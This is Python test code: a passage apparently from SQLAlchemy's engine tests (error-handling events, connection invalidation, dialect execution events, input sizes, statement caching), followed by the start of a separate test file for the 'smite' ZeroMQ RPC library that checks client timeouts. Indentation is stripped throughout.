class MyException3(Exception):
pass
@event.listens_for(engine, "handle_error", retval=True)
def err1(context):
stmt = context.statement
if (
"ERROR ONE" in str(stmt)
or "ERROR TWO" in str(stmt)
or "ERROR THREE" in str(stmt)
):
return MyException1("my exception")
elif "ERROR FOUR" in str(stmt):
raise MyException3("my exception short circuit")
@event.listens_for(engine, "handle_error", retval=True)
def err2(context):
stmt = context.statement
if (
"ERROR ONE" in str(stmt) or "ERROR FOUR" in str(stmt)
) and isinstance(context.chained_exception, MyException1):
raise MyException2("my exception chained")
elif "ERROR TWO" in str(stmt):
return context.chained_exception
else:
return None
conn = engine.connect()
with patch.object(
engine.dialect.execution_ctx_cls, "handle_dbapi_exception"
) as patched:
assert_raises_message(
MyException2,
"my exception chained",
conn.exec_driver_sql,
"SELECT 'ERROR ONE' FROM I_DONT_EXIST",
)
eq_(patched.call_count, 1)
with patch.object(
engine.dialect.execution_ctx_cls, "handle_dbapi_exception"
) as patched:
assert_raises(
MyException1,
conn.exec_driver_sql,
"SELECT 'ERROR TWO' FROM I_DONT_EXIST",
)
eq_(patched.call_count, 1)
with patch.object(
engine.dialect.execution_ctx_cls, "handle_dbapi_exception"
) as patched:
# test that non None from err1 isn't cancelled out
# by err2
assert_raises(
MyException1,
conn.exec_driver_sql,
"SELECT 'ERROR THREE' FROM I_DONT_EXIST",
)
eq_(patched.call_count, 1)
with patch.object(
engine.dialect.execution_ctx_cls, "handle_dbapi_exception"
) as patched:
assert_raises(
tsa.exc.DBAPIError,
conn.exec_driver_sql,
"SELECT 'ERROR FIVE' FROM I_DONT_EXIST",
)
eq_(patched.call_count, 1)
with patch.object(
engine.dialect.execution_ctx_cls, "handle_dbapi_exception"
) as patched:
assert_raises_message(
MyException3,
"my exception short circuit",
conn.exec_driver_sql,
"SELECT 'ERROR FOUR' FROM I_DONT_EXIST",
)
eq_(patched.call_count, 1)
def test_exception_autorollback_fails(self):
engine = engines.testing_engine()
conn = engine.connect()
def boom(connection):
raise engine.dialect.dbapi.OperationalError("rollback failed")
with expect_warnings(
r"An exception has occurred during handling of a previous "
r"exception. The previous exception "
r"is.*(?:i_dont_exist|does not exist)",
py2konly=True,
):
with patch.object(conn.dialect, "do_rollback", boom):
assert_raises_message(
tsa.exc.OperationalError,
"rollback failed",
conn.exec_driver_sql,
"insert into i_dont_exist (x) values ('y')",
)
def test_exception_event_ad_hoc_context(self):
"""test that handle_error is called with a context in
cases where _handle_dbapi_error() is normally called without
any context.
"""
engine = engines.testing_engine()
listener = Mock(return_value=None)
event.listen(engine, "handle_error", listener)
nope = SomeException("nope")
class MyType(TypeDecorator):
impl = Integer
cache_ok = True
def process_bind_param(self, value, dialect):
raise nope
with engine.connect() as conn:
assert_raises_message(
tsa.exc.StatementError,
r"\(.*.SomeException\) " r"nope\n\[SQL\: u?SELECT 1 ",
conn.execute,
select(1).where(column("foo") == literal("bar", MyType())),
)
ctx = listener.mock_calls[0][1][0]
assert ctx.statement.startswith("SELECT 1 ")
is_(ctx.is_disconnect, False)
is_(ctx.original_exception, nope)
def test_exception_event_non_dbapi_error(self):
"""test that handle_error is called with a context in
cases where DBAPI raises an exception that is not a DBAPI
exception, e.g. internal errors or encoding problems.
"""
engine = engines.testing_engine()
listener = Mock(return_value=None)
event.listen(engine, "handle_error", listener)
nope = TypeError("I'm not a DBAPI error")
with engine.connect() as c:
c.connection.cursor = Mock(
return_value=Mock(execute=Mock(side_effect=nope))
)
assert_raises_message(
TypeError,
"I'm not a DBAPI error",
c.exec_driver_sql,
"select ",
)
ctx = listener.mock_calls[0][1][0]
eq_(ctx.statement, "select ")
is_(ctx.is_disconnect, False)
is_(ctx.original_exception, nope)
def test_exception_event_disable_handlers(self):
engine = engines.testing_engine()
class MyException1(Exception):
pass
@event.listens_for(engine, "handle_error")
def err1(context):
stmt = context.statement
if "ERROR_ONE" in str(stmt):
raise MyException1("my exception short circuit")
with engine.connect() as conn:
assert_raises(
tsa.exc.DBAPIError,
conn.execution_options(
skip_user_error_events=True
).exec_driver_sql,
"SELECT ERROR_ONE FROM I_DONT_EXIST",
)
assert_raises(
MyException1,
conn.execution_options(
skip_user_error_events=False
).exec_driver_sql,
"SELECT ERROR_ONE FROM I_DONT_EXIST",
)
def _test_alter_disconnect(self, orig_error, evt_value):
engine = engines.testing_engine()
@event.listens_for(engine, "handle_error")
def evt(ctx):
ctx.is_disconnect = evt_value
with patch.object(
engine.dialect, "is_disconnect", Mock(return_value=orig_error)
):
with engine.connect() as c:
try:
c.exec_driver_sql("SELECT x FROM nonexistent")
assert False
except tsa.exc.StatementError as st:
eq_(st.connection_invalidated, evt_value)
def test_alter_disconnect_to_true(self):
self._test_alter_disconnect(False, True)
self._test_alter_disconnect(True, True)
def test_alter_disconnect_to_false(self):
self._test_alter_disconnect(True, False)
self._test_alter_disconnect(False, False)
@testing.requires.independent_connections
def _test_alter_invalidate_pool_to_false(self, set_to_false):
orig_error = True
engine = engines.testing_engine()
@event.listens_for(engine, "handle_error")
def evt(ctx):
if set_to_false:
ctx.invalidate_pool_on_disconnect = False
c1, c2, c3 = (
engine.pool.connect(),
engine.pool.connect(),
engine.pool.connect(),
)
crecs = [conn._connection_record for conn in (c1, c2, c3)]
c1.close()
c2.close()
c3.close()
with patch.object(
engine.dialect, "is_disconnect", Mock(return_value=orig_error)
):
with engine.connect() as c:
target_crec = c.connection._connection_record
try:
c.exec_driver_sql("SELECT x FROM nonexistent")
assert False
except tsa.exc.StatementError as st:
eq_(st.connection_invalidated, True)
for crec in crecs:
if crec is target_crec or not set_to_false:
is_not(crec.dbapi_connection, crec.get_connection())
else:
is_(crec.dbapi_connection, crec.get_connection())
def test_alter_invalidate_pool_to_false(self):
self._test_alter_invalidate_pool_to_false(True)
def test_alter_invalidate_pool_stays_true(self):
self._test_alter_invalidate_pool_to_false(False)
def test_handle_error_event_connect_isolation_level(self):
engine = engines.testing_engine()
class MySpecialException(Exception):
pass
@event.listens_for(engine, "handle_error")
def handle_error(ctx):
raise MySpecialException("failed operation")
ProgrammingError = engine.dialect.dbapi.ProgrammingError
with engine.connect() as conn:
with patch.object(
conn.dialect,
"get_isolation_level",
Mock(side_effect=ProgrammingError("random error")),
):
assert_raises(MySpecialException, conn.get_isolation_level)
@testing.only_on("sqlite+pysqlite")
def test_cursor_close_resultset_failed_connectionless(self):
engine = engines.testing_engine()
the_conn = []
the_cursor = []
@event.listens_for(engine, "after_cursor_execute")
def go(
connection, cursor, statement, parameters, context, executemany
):
the_cursor.append(cursor)
the_conn.append(connection)
with mock.patch(
"sqlalchemy.engine.cursor.BaseCursorResult.__init__",
Mock(side_effect=tsa.exc.InvalidRequestError("duplicate col")),
):
with engine.connect() as conn:
assert_raises(
tsa.exc.InvalidRequestError,
conn.execute,
text("select 1"),
)
# cursor is closed
assert_raises_message(
engine.dialect.dbapi.ProgrammingError,
"Cannot operate on a closed cursor",
the_cursor[0].execute,
"select 1",
)
# connection is closed
assert the_conn[0].closed
@testing.only_on("sqlite+pysqlite")
def test_cursor_close_resultset_failed_explicit(self):
engine = engines.testing_engine()
the_cursor = []
@event.listens_for(engine, "after_cursor_execute")
def go(
connection, cursor, statement, parameters, context, executemany
):
the_cursor.append(cursor)
conn = engine.connect()
with mock.patch(
"sqlalchemy.engine.cursor.BaseCursorResult.__init__",
Mock(side_effect=tsa.exc.InvalidRequestError("duplicate col")),
):
assert_raises(
tsa.exc.InvalidRequestError,
conn.execute,
text("select 1"),
)
# cursor is closed
assert_raises_message(
engine.dialect.dbapi.ProgrammingError,
"Cannot operate on a closed cursor",
the_cursor[0].execute,
"select 1",
)
# connection not closed
assert not conn.closed
conn.close()
class OnConnectTest(fixtures.TestBase):
__requires__ = ("sqlite",)
def setup_test(self):
e = create_engine("sqlite://")
connection = Mock(get_server_version_info=Mock(return_value="5.0"))
def connect(*args, **kwargs):
return connection
dbapi = Mock(
sqlite_version_info=(99, 9, 9),
version_info=(99, 9, 9),
sqlite_version="99.9.9",
paramstyle="named",
connect=Mock(side_effect=connect),
)
sqlite3 = e.dialect.dbapi
dbapi.Error = (sqlite3.Error,)
dbapi.ProgrammingError = sqlite3.ProgrammingError
self.dbapi = dbapi
self.ProgrammingError = sqlite3.ProgrammingError
def test_wraps_connect_in_dbapi(self):
dbapi = self.dbapi
dbapi.connect = Mock(side_effect=self.ProgrammingError("random error"))
try:
create_engine("sqlite://", module=dbapi).connect()
assert False
except tsa.exc.DBAPIError as de:
assert not de.connection_invalidated
def test_handle_error_event_connect(self):
dbapi = self.dbapi
dbapi.connect = Mock(side_effect=self.ProgrammingError("random error"))
class MySpecialException(Exception):
pass
eng = create_engine("sqlite://", module=dbapi)
@event.listens_for(eng, "handle_error")
def handle_error(ctx):
assert ctx.engine is eng
assert ctx.connection is None
raise MySpecialException("failed operation")
assert_raises(MySpecialException, eng.connect)
def test_handle_error_event_revalidate(self):
dbapi = self.dbapi
class MySpecialException(Exception):
pass
eng = create_engine("sqlite://", module=dbapi, _initialize=False)
@event.listens_for(eng, "handle_error")
def handle_error(ctx):
assert ctx.engine is eng
assert ctx.connection is conn
assert isinstance(
ctx.sqlalchemy_exception, tsa.exc.ProgrammingError
)
raise MySpecialException("failed operation")
conn = eng.connect()
conn.invalidate()
dbapi.connect = Mock(side_effect=self.ProgrammingError("random error"))
assert_raises(MySpecialException, getattr, conn, "connection")
def test_handle_error_event_implicit_revalidate(self):
dbapi = self.dbapi
class MySpecialException(Exception):
pass
eng = create_engine("sqlite://", module=dbapi, _initialize=False)
@event.listens_for(eng, "handle_error")
def handle_error(ctx):
assert ctx.engine is eng
assert ctx.connection is conn
assert isinstance(
ctx.sqlalchemy_exception, tsa.exc.ProgrammingError
)
raise MySpecialException("failed operation")
conn = eng.connect()
conn.invalidate()
dbapi.connect = Mock(side_effect=self.ProgrammingError("random error"))
assert_raises(MySpecialException, conn.execute, select(1))
def test_handle_error_custom_connect(self):
dbapi = self.dbapi
class MySpecialException(Exception):
pass
def custom_connect():
raise self.ProgrammingError("random error")
eng = create_engine("sqlite://", module=dbapi, creator=custom_connect)
@event.listens_for(eng, "handle_error")
def handle_error(ctx):
assert ctx.engine is eng
assert ctx.connection is None
raise MySpecialException("failed operation")
assert_raises(MySpecialException, eng.connect)
def test_handle_error_event_connect_invalidate_flag(self):
dbapi = self.dbapi
dbapi.connect = Mock(
side_effect=self.ProgrammingError(
"Cannot operate on a closed database."
)
)
class MySpecialException(Exception):
pass
eng = create_engine("sqlite://", module=dbapi)
@event.listens_for(eng, "handle_error")
def handle_error(ctx):
assert ctx.is_disconnect
ctx.is_disconnect = False
try:
eng.connect()
assert False
except tsa.exc.DBAPIError as de:
assert not de.connection_invalidated
def test_cant_connect_stay_invalidated(self):
class MySpecialException(Exception):
pass
eng = create_engine("sqlite://")
@event.listens_for(eng, "handle_error")
def handle_error(ctx):
assert ctx.is_disconnect
conn = eng.connect()
conn.invalidate()
eng.pool._creator = Mock(
side_effect=self.ProgrammingError(
"Cannot operate on a closed database."
)
)
try:
conn.connection
assert False
except tsa.exc.DBAPIError:
assert conn.invalidated
def test_dont_touch_non_dbapi_exception_on_connect(self):
dbapi = self.dbapi
dbapi.connect = Mock(side_effect=TypeError("I'm not a DBAPI error"))
e = create_engine("sqlite://", module=dbapi)
e.dialect.is_disconnect = is_disconnect = Mock()
assert_raises_message(TypeError, "I'm not a DBAPI error", e.connect)
eq_(is_disconnect.call_count, 0)
def test_ensure_dialect_does_is_disconnect_no_conn(self):
"""test that is_disconnect() doesn't choke if no connection,
cursor given."""
dialect = testing.db.dialect
dbapi = dialect.dbapi
assert not dialect.is_disconnect(
dbapi.OperationalError("test"), None, None
)
def test_invalidate_on_connect(self):
"""test that is_disconnect() is called during connect.
interpretation of connection failures are not supported by
every backend.
"""
dbapi = self.dbapi
dbapi.connect = Mock(
side_effect=self.ProgrammingError(
"Cannot operate on a closed database."
)
)
e = create_engine("sqlite://", module=dbapi)
try:
e.connect()
assert False
except tsa.exc.DBAPIError as de:
assert de.connection_invalidated
@testing.only_on("sqlite+pysqlite")
def test_initialize_connect_calls(self):
"""test for :ticket:`5497`, on_connect not called twice"""
m1 = Mock()
cls_ = testing.db.dialect.__class__
class SomeDialect(cls_):
def initialize(self, connection):
super(SomeDialect, self).initialize(connection)
m1.initialize(connection)
def on_connect(self):
oc = super(SomeDialect, self).on_connect()
def my_on_connect(conn):
if oc:
oc(conn)
m1.on_connect(conn)
return my_on_connect
u1 = Mock(
username=None,
password=None,
host=None,
port=None,
query={},
database=None,
_instantiate_plugins=lambda kw: (u1, [], kw),
_get_entrypoint=Mock(
return_value=Mock(get_dialect_cls=lambda u: SomeDialect)
),
)
eng = create_engine(u1, poolclass=QueuePool)
# make sure other dialects aren't getting pulled in here
eq_(eng.name, "sqlite")
c = eng.connect()
dbapi_conn_one = c.connection.dbapi_connection
c.close()
eq_(
m1.mock_calls,
[call.on_connect(dbapi_conn_one), call.initialize(mock.ANY)],
)
c = eng.connect()
eq_(
m1.mock_calls,
[call.on_connect(dbapi_conn_one), call.initialize(mock.ANY)],
)
c2 = eng.connect()
dbapi_conn_two = c2.connection.dbapi_connection
is_not(dbapi_conn_one, dbapi_conn_two)
eq_(
m1.mock_calls,
[
call.on_connect(dbapi_conn_one),
call.initialize(mock.ANY),
call.on_connect(dbapi_conn_two),
],
)
c.close()
c2.close()
@testing.only_on("sqlite+pysqlite")
def test_initialize_connect_race(self):
"""test for :ticket:`6337` fixing the regression in :ticket:`5497`,
dialect init is mutexed"""
m1 = []
cls_ = testing.db.dialect.__class__
class SomeDialect(cls_):
def initialize(self, connection):
super(SomeDialect, self).initialize(connection)
m1.append("initialize")
def on_connect(self):
oc = super(SomeDialect, self).on_connect()
def my_on_connect(conn):
if oc:
oc(conn)
m1.append("on_connect")
return my_on_connect
u1 = Mock(
username=None,
password=None,
host=None,
port=None,
query={},
database=None,
_instantiate_plugins=lambda kw: (u1, [], kw),
_get_entrypoint=Mock(
return_value=Mock(get_dialect_cls=lambda u: SomeDialect)
),
)
for j in range(5):
m1[:] = []
eng = create_engine(
u1,
poolclass=NullPool,
connect_args={"check_same_thread": False},
)
def go():
c = eng.connect()
c.execute(text("select 1"))
c.close()
threads = [threading.Thread(target=go) for i in range(10)]
for t in threads:
t.start()
for t in threads:
t.join()
eq_(m1, ["on_connect", "initialize"] + ["on_connect"] * 9)
class DialectEventTest(fixtures.TestBase):
@contextmanager
def _run_test(self, retval):
m1 = Mock()
m1.do_execute.return_value = retval
m1.do_executemany.return_value = retval
m1.do_execute_no_params.return_value = retval
e = engines.testing_engine(options={"_initialize": False})
event.listen(e, "do_execute", m1.do_execute)
event.listen(e, "do_executemany", m1.do_executemany)
event.listen(e, "do_execute_no_params", m1.do_execute_no_params)
e.dialect.do_execute = m1.real_do_execute
e.dialect.do_executemany = m1.real_do_executemany
e.dialect.do_execute_no_params = m1.real_do_execute_no_params
def mock_the_cursor(cursor, *arg):
arg[-1].get_result_proxy = Mock(return_value=Mock(context=arg[-1]))
return retval
m1.real_do_execute.side_effect = (
m1.do_execute.side_effect
) = mock_the_cursor
m1.real_do_executemany.side_effect = (
m1.do_executemany.side_effect
) = mock_the_cursor
m1.real_do_execute_no_params.side_effect = (
m1.do_execute_no_params.side_effect
) = mock_the_cursor
with e.begin() as conn:
yield conn, m1
def _assert(self, retval, m1, m2, mock_calls):
eq_(m1.mock_calls, mock_calls)
if retval:
eq_(m2.mock_calls, [])
else:
eq_(m2.mock_calls, mock_calls)
def _test_do_execute(self, retval):
with self._run_test(retval) as (conn, m1):
result = conn.exec_driver_sql(
"insert into table foo", {"foo": "bar"}
)
self._assert(
retval,
m1.do_execute,
m1.real_do_execute,
[
call(
result.context.cursor,
"insert into table foo",
{"foo": "bar"},
result.context,
)
],
)
def _test_do_executemany(self, retval):
with self._run_test(retval) as (conn, m1):
result = conn.exec_driver_sql(
"insert into table foo", [{"foo": "bar"}, {"foo": "bar"}]
)
self._assert(
retval,
m1.do_executemany,
m1.real_do_executemany,
[
call(
result.context.cursor,
"insert into table foo",
[{"foo": "bar"}, {"foo": "bar"}],
result.context,
)
],
)
def _test_do_execute_no_params(self, retval):
with self._run_test(retval) as (conn, m1):
result = conn.execution_options(
no_parameters=True
).exec_driver_sql("insert into table foo")
self._assert(
retval,
m1.do_execute_no_params,
m1.real_do_execute_no_params,
[
call(
result.context.cursor,
"insert into table foo",
result.context,
)
],
)
def _test_cursor_execute(self, retval):
with self._run_test(retval) as (conn, m1):
dialect = conn.dialect
stmt = "insert into table foo"
params = {"foo": "bar"}
ctx = dialect.execution_ctx_cls._init_statement(
dialect,
conn,
conn.connection,
{},
stmt,
[params],
)
conn._cursor_execute(ctx.cursor, stmt, params, ctx)
self._assert(
retval,
m1.do_execute,
m1.real_do_execute,
[call(ctx.cursor, "insert into table foo", {"foo": "bar"}, ctx)],
)
def test_do_execute_w_replace(self):
self._test_do_execute(True)
def test_do_execute_wo_replace(self):
self._test_do_execute(False)
def test_do_executemany_w_replace(self):
self._test_do_executemany(True)
def test_do_executemany_wo_replace(self):
self._test_do_executemany(False)
def test_do_execute_no_params_w_replace(self):
self._test_do_execute_no_params(True)
def test_do_execute_no_params_wo_replace(self):
self._test_do_execute_no_params(False)
def test_cursor_execute_w_replace(self):
self._test_cursor_execute(True)
def test_cursor_execute_wo_replace(self):
self._test_cursor_execute(False)
def test_connect_replace_params(self):
e = engines.testing_engine(options={"_initialize": False})
@event.listens_for(e, "do_connect")
def evt(dialect, conn_rec, cargs, cparams):
cargs[:] = ["foo", "hoho"]
cparams.clear()
cparams["bar"] = "bat"
conn_rec.info["boom"] = "bap"
m1 = Mock()
e.dialect.connect = m1.real_connect
with e.connect() as conn:
eq_(m1.mock_calls, [call.real_connect("foo", "hoho", bar="bat")])
eq_(conn.info["boom"], "bap")
def test_connect_do_connect(self):
e = engines.testing_engine(options={"_initialize": False})
m1 = Mock()
@event.listens_for(e, "do_connect")
def evt1(dialect, conn_rec, cargs, cparams):
cargs[:] = ["foo", "hoho"]
cparams.clear()
cparams["bar"] = "bat"
conn_rec.info["boom"] = "one"
@event.listens_for(e, "do_connect")
def evt2(dialect, conn_rec, cargs, cparams):
conn_rec.info["bap"] = "two"
return m1.our_connect(cargs, cparams)
with e.connect() as conn:
# called with args
eq_(
m1.mock_calls,
[call.our_connect(["foo", "hoho"], {"bar": "bat"})],
)
eq_(conn.info["boom"], "one")
eq_(conn.info["bap"], "two")
# returned our mock connection
is_(conn.connection.dbapi_connection, m1.our_connect())
def test_connect_do_connect_info_there_after_recycle(self):
# test that info is maintained after the do_connect()
# event for a soft invalidation.
e = engines.testing_engine(options={"_initialize": False})
@event.listens_for(e, "do_connect")
def evt1(dialect, conn_rec, cargs, cparams):
conn_rec.info["boom"] = "one"
conn = e.connect()
eq_(conn.info["boom"], "one")
conn.connection.invalidate(soft=True)
conn.close()
conn = e.connect()
eq_(conn.info["boom"], "one")
def test_connect_do_connect_info_there_after_invalidate(self):
# test that info is maintained after the do_connect()
# event for a hard invalidation.
e = engines.testing_engine(options={"_initialize": False})
@event.listens_for(e, "do_connect")
def evt1(dialect, conn_rec, cargs, cparams):
assert not conn_rec.info
conn_rec.info["boom"] = "one"
conn = e.connect()
eq_(conn.info["boom"], "one")
conn.connection.invalidate()
conn = e.connect()
eq_(conn.info["boom"], "one")
class FutureExecuteTest(fixtures.FutureEngineMixin, fixtures.TablesTest):
__backend__ = True
@classmethod
def define_tables(cls, metadata):
Table(
"users",
metadata,
Column("user_id", INT, primary_key=True, autoincrement=False),
Column("user_name", VARCHAR(20)),
test_needs_acid=True,
)
Table(
"users_autoinc",
metadata,
Column(
"user_id", INT, primary_key=True, test_needs_autoincrement=True
),
Column("user_name", VARCHAR(20)),
test_needs_acid=True,
)
def test_non_dict_mapping(self, connection):
"""ensure arbitrary Mapping works for execute()"""
class NotADict(collections_abc.Mapping):
def __init__(self, _data):
self._data = _data
def __iter__(self):
return iter(self._data)
def __len__(self):
return len(self._data)
def __getitem__(self, key):
return self._data[key]
def keys(self):
return self._data.keys()
nd = NotADict({"a": 10, "b": 15})
eq_(dict(nd), {"a": 10, "b": 15})
result = connection.execute(
select(
bindparam("a", type_=Integer), bindparam("b", type_=Integer)
),
nd,
)
eq_(result.first(), (10, 15))
def test_row_works_as_mapping(self, connection):
"""ensure the RowMapping object works as a parameter dictionary for
execute."""
result = connection.execute(
select(literal(10).label("a"), literal(15).label("b"))
)
row = result.first()
eq_(row, (10, 15))
eq_(row._mapping, {"a": 10, "b": 15})
result = connection.execute(
select(
bindparam("a", type_=Integer).label("a"),
bindparam("b", type_=Integer).label("b"),
),
row._mapping,
)
row = result.first()
eq_(row, (10, 15))
eq_(row._mapping, {"a": 10, "b": 15})
@testing.combinations(
({}, {}, {}),
({"a": "b"}, {}, {"a": "b"}),
({"a": "b", "d": "e"}, {"a": "c"}, {"a": "c", "d": "e"}),
argnames="conn_opts, exec_opts, expected",
)
def test_execution_opts_per_invoke(
self, connection, conn_opts, exec_opts, expected
):
opts = []
@event.listens_for(connection, "before_cursor_execute")
def before_cursor_execute(
conn, cursor, statement, parameters, context, executemany
):
opts.append(context.execution_options)
if conn_opts:
connection = connection.execution_options(**conn_opts)
if exec_opts:
connection.execute(select(1), execution_options=exec_opts)
else:
connection.execute(select(1))
eq_(opts, [expected])
@testing.combinations(
({}, {}, {}, {}),
({}, {"a": "b"}, {}, {"a": "b"}),
({}, {"a": "b", "d": "e"}, {"a": "c"}, {"a": "c", "d": "e"}),
(
{"q": "z", "p": "r"},
{"a": "b", "p": "x", "d": "e"},
{"a": "c"},
{"q": "z", "p": "x", "a": "c", "d": "e"},
),
argnames="stmt_opts, conn_opts, exec_opts, expected",
)
def test_execution_opts_per_invoke_execute_events(
self, connection, stmt_opts, conn_opts, exec_opts, expected
):
opts = []
@event.listens_for(connection, "before_execute")
def before_execute(
conn, clauseelement, multiparams, params, execution_options
):
opts.append(("before", execution_options))
@event.listens_for(connection, "after_execute")
def after_execute(
conn,
clauseelement,
multiparams,
params,
execution_options,
result,
):
opts.append(("after", execution_options))
stmt = select(1)
if stmt_opts:
stmt = stmt.execution_options(**stmt_opts)
if conn_opts:
connection = connection.execution_options(**conn_opts)
if exec_opts:
connection.execute(stmt, execution_options=exec_opts)
else:
connection.execute(stmt)
eq_(opts, [("before", expected), ("after", expected)])
def test_no_branching(self, connection):
with testing.expect_deprecated(
r"The Connection.connect\(\) method is considered legacy"
):
assert_raises_message(
NotImplementedError,
"sqlalchemy.future.Connection does not support "
"'branching' of new connections.",
connection.connect,
)
class SetInputSizesTest(fixtures.TablesTest):
__backend__ = True
__requires__ = ("independent_connections",)
@classmethod
def define_tables(cls, metadata):
Table(
"users",
metadata,
Column("user_id", INT, primary_key=True, autoincrement=False),
Column("user_name", VARCHAR(20)),
)
@testing.fixture
def input_sizes_fixture(self, testing_engine):
canary = mock.Mock()
def do_set_input_sizes(cursor, list_of_tuples, context):
if not engine.dialect.positional:
# sort by "user_id", "user_name", or otherwise
# param name for a non-positional dialect, so that we can
# confirm the ordering. mostly a py2 thing probably can't
# occur on py3.6+ since we are passing dictionaries with
# "user_id", "user_name"
list_of_tuples = sorted(
list_of_tuples, key=lambda elem: elem[0]
)
canary.do_set_input_sizes(cursor, list_of_tuples, context)
def pre_exec(self):
self.translate_set_input_sizes = None
self.include_set_input_sizes = None
self.exclude_set_input_sizes = None
engine = testing_engine()
engine.connect().close()
# the idea of this test is we fully replace the dialect
# do_set_input_sizes with a mock, and we can then intercept
# the setting passed to the dialect. the test table uses very
# "safe" datatypes so that the DBAPI does not actually need
# setinputsizes() called in order to work.
with mock.patch.object(
engine.dialect, "use_setinputsizes", True
), mock.patch.object(
engine.dialect, "do_set_input_sizes", do_set_input_sizes
), mock.patch.object(
engine.dialect.execution_ctx_cls, "pre_exec", pre_exec
):
yield engine, canary
def test_set_input_sizes_no_event(self, input_sizes_fixture):
engine, canary = input_sizes_fixture
with engine.begin() as conn:
conn.execute(
self.tables.users.insert(),
[
{"user_id": 1, "user_name": "n1"},
{"user_id": 2, "user_name": "n2"},
],
)
eq_(
canary.mock_calls,
[
call.do_set_input_sizes(
mock.ANY,
[
(
"user_id",
mock.ANY,
testing.eq_type_affinity(Integer),
),
(
"user_name",
mock.ANY,
testing.eq_type_affinity(String),
),
],
mock.ANY,
)
],
)
def test_set_input_sizes_expanding_param(self, input_sizes_fixture):
engine, canary = input_sizes_fixture
with engine.connect() as conn:
conn.execute(
select(self.tables.users).where(
self.tables.users.c.user_name.in_(["x", "y", "z"])
)
)
eq_(
canary.mock_calls,
[
call.do_set_input_sizes(
mock.ANY,
[
(
"user_name_1_1",
mock.ANY,
testing.eq_type_affinity(String),
),
(
"user_name_1_2",
mock.ANY,
testing.eq_type_affinity(String),
),
(
"user_name_1_3",
mock.ANY,
testing.eq_type_affinity(String),
),
],
mock.ANY,
)
],
)
@testing.requires.tuple_in
def test_set_input_sizes_expanding_tuple_param(self, input_sizes_fixture):
engine, canary = input_sizes_fixture
from sqlalchemy import tuple_
with engine.connect() as conn:
conn.execute(
select(self.tables.users).where(
tuple_(
self.tables.users.c.user_id,
self.tables.users.c.user_name,
).in_([(1, "x"), (2, "y")])
)
)
eq_(
canary.mock_calls,
[
call.do_set_input_sizes(
mock.ANY,
[
(
"param_1_1_1",
mock.ANY,
testing.eq_type_affinity(Integer),
),
(
"param_1_1_2",
mock.ANY,
testing.eq_type_affinity(String),
),
(
"param_1_2_1",
mock.ANY,
testing.eq_type_affinity(Integer),
),
(
"param_1_2_2",
mock.ANY,
testing.eq_type_affinity(String),
),
],
mock.ANY,
)
],
)
def test_set_input_sizes_event(self, input_sizes_fixture):
engine, canary = input_sizes_fixture
SPECIAL_STRING = mock.Mock()
@event.listens_for(engine, "do_setinputsizes")
def do_setinputsizes(
inputsizes, cursor, statement, parameters, context
):
for k in inputsizes:
if k.type._type_affinity is String:
inputsizes[k] = (
SPECIAL_STRING,
None,
0,
)
with engine.begin() as conn:
conn.execute(
self.tables.users.insert(),
[
{"user_id": 1, "user_name": "n1"},
{"user_id": 2, "user_name": "n2"},
],
)
eq_(
canary.mock_calls,
[
call.do_set_input_sizes(
mock.ANY,
[
(
"user_id",
mock.ANY,
testing.eq_type_affinity(Integer),
),
(
"user_name",
(SPECIAL_STRING, None, 0),
testing.eq_type_affinity(String),
),
],
mock.ANY,
)
],
)
class DialectDoesntSupportCachingTest(fixtures.TestBase):
"""test the opt-in caching flag added in :ticket:`6184`."""
__only_on__ = "sqlite+pysqlite"
__requires__ = ("sqlite_memory",)
@testing.fixture()
def sqlite_no_cache_dialect(self, testing_engine):
from sqlalchemy.dialects.sqlite.pysqlite import SQLiteDialect_pysqlite
from sqlalchemy.dialects.sqlite.base import SQLiteCompiler
from sqlalchemy.sql import visitors
class MyCompiler(SQLiteCompiler):
def translate_select_structure(self, select_stmt, **kwargs):
select = select_stmt
if not getattr(select, "_mydialect_visit", None):
select = visitors.cloned_traverse(select_stmt, {}, {})
if select._limit_clause is not None:
# create a bindparam with a fixed name and hardcode
# it to the given limit. this breaks caching.
select._limit_clause = bindparam(
"limit", value=select._limit, literal_execute=True
)
select._mydialect_visit = True
return select
class MyDialect(SQLiteDialect_pysqlite):
statement_compiler = MyCompiler
supports_statement_cache = False
from sqlalchemy.dialects import registry
def go(name):
return MyDialect
with mock.patch.object(registry, "load", go):
eng = testing_engine()
yield eng
@testing.fixture
def data_fixture(self, sqlite_no_cache_dialect):
m = MetaData()
t = Table("t1", m, Column("x", Integer))
with sqlite_no_cache_dialect.begin() as conn:
t.create(conn)
conn.execute(t.insert(), [{"x": 1}, {"x": 2}, {"x": 3}, {"x": 4}])
return t
def test_no_cache(self, sqlite_no_cache_dialect, data_fixture):
eng = sqlite_no_cache_dialect
def go(lim):
with eng.connect() as conn:
result = conn.execute(
select(data_fixture).order_by(data_fixture.c.x).limit(lim)
)
return result
r1 = go(2)
r2 = go(3)
eq_(r1.all(), [(1,), (2,)])
eq_(r2.all(), [(1,), (2,), (3,)])
def test_it_caches(self, sqlite_no_cache_dialect, data_fixture):
eng = sqlite_no_cache_dialect
eng.dialect.__class__.supports_statement_cache = True
del eng.dialect.__dict__["_supports_statement_cache"]
def go(lim):
with eng.connect() as conn:
result = conn.execute(
select(data_fixture).order_by(data_fixture.c.x).limit(lim)
)
return result
r1 = go(2)
r2 = go(3)
eq_(r1.all(), [(1,), (2,)])
# wrong answer
eq_(
r2.all(),
[
(1,),
(2,),
],
)
|
tests.py
|
import os
import uuid
import time
import random
from threading import Thread
from string import ascii_lowercase
import zmq
from smite import (
Client,
RClient,
Servant,
Proxy,
utils,
)
from smite.exceptions import (
ClientTimeout,
MessageException,
)
HOST = '127.0.0.1'
PORT = 3000
CONNECTION_URI = 'tcp://{}:{}'.format(HOST, PORT)
def create_keys_dir():
rnd_str = ''.join([random.choice(ascii_lowercase) for _ in range(10)])
dir_ = '/tmp/smite_test_keys_{}'.format(rnd_str)
os.mkdir(dir_)
return dir_
def test_client_timeout():
timeout = 3
client = Client(default_timeout=timeout)
client.connect(CONNECTION_URI)
raised = False
start = time.time()
try:
client.send('dummy_method')
except ClientTimeout:
raised = True
assert raised
# it should take around 3 seconds
assert 2.5 < time.time() - start < 3.5
# servant should not get this message after start, it's just gone
class DummyException(Exception):
pass
def dummy_method():
raise DummyException
servant = Servant({'dummy_method': dummy_method})
servant.bind_tcp(HOST, PORT)
# run servant in separate thread and wait 3 seconds for message
servant_thread = Thread(target=servant.run)
servant_thread.start()
time.sleep(3)
servant.stop()
servant_thread.join()
client.close()
for thread_stats in servant.stats['threads'].values():
assert thread_stats['exceptions'] == 0
assert thread_stats['received_messages'] == 0
assert thread_stats['malicious_messages'] == 0
